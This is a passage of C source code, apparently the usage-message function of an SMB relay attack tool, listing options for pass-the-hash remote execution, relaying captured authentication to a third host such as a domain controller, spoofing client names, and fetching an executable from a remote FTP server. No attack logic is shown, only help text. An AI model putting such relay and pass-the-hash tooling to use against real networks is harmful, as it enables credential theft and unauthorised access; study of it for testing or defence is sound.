00397 printf(" --psexec <host> <username> <:NTLMHash> (psexec like tool)\n");
00398
00399
00400 printf("\nOptional Parameters\n");
00401
00402 printf(" --AlternativeSrcPort <port> (Listen under different Port)\n");
00403 printf(" --AlternativeDstPort <port> (Connect to a different SMB Port)\n");
00404 printf(" --SMBDestinationHost <host> (Replay attack against third part host)\n");
00405 printf(" --SrcHostname <host> (Spoof incoming client name for Win2k (default smbrelay)\n");
00406
00407 printf(" --ftp <hostname> <port> <user> <pass> (download smrs.exe from remote ftp server)\n");
00408 printf(" --v[v] (Displays verbose information )\n");
00409
00410 printf("\n");
00411 printf("Example: smrelay3.exe --ListForHTTPRequests --AlternativeSrcPort 8080 --SMBDestinationHost dc.mydomain.com\n");
00412 exit(1);
00413 }
00414
00415